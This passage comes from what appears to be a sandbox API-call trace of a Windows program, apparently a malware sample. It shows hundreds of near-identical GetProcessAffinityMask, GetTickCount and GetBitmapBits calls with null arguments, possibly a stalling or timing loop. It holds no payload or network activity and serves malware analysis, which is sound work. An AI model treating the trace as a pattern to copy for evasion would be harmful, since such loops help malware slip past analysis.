lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.255] GetTickCount () returned 0x202a4a8 [0252.255] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.255] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4a8 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.256] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4a8 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.256] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4a8 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.256] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4a8 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.256] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4a8 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.256] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4a8 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.256] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.256] GetTickCount () returned 0x202a4b7 [0252.256] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.257] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.257] GetTickCount () returned 0x202a4b7 [0252.257] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.258] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.258] GetTickCount () returned 0x202a4b7 [0252.258] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.259] GetTickCount () returned 0x202a4b7 [0252.259] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.259] GetTickCount () returned 0x202a4b7 [0252.259] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.259] GetTickCount () returned 0x202a4b7 [0252.259] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.259] GetTickCount () returned 0x202a4b7 [0252.259] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.259] GetTickCount () returned 0x202a4b7 [0252.259] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.259] GetTickCount () returned 0x202a4b7 [0252.259] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.259] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.260] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.260] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.260] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.260] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.260] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.260] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.260] GetTickCount () returned 0x202a4b7 [0252.260] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.261] GetTickCount () returned 0x202a4b7 [0252.261] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.261] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.262] GetTickCount () returned 0x202a4b7 [0252.262] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.262] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.263] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.263] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.263] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.264] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.264] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.264] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.265] GetTickCount () returned 0x202a4b7 [0252.265] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.265] GetProcessAffinityMask (in: 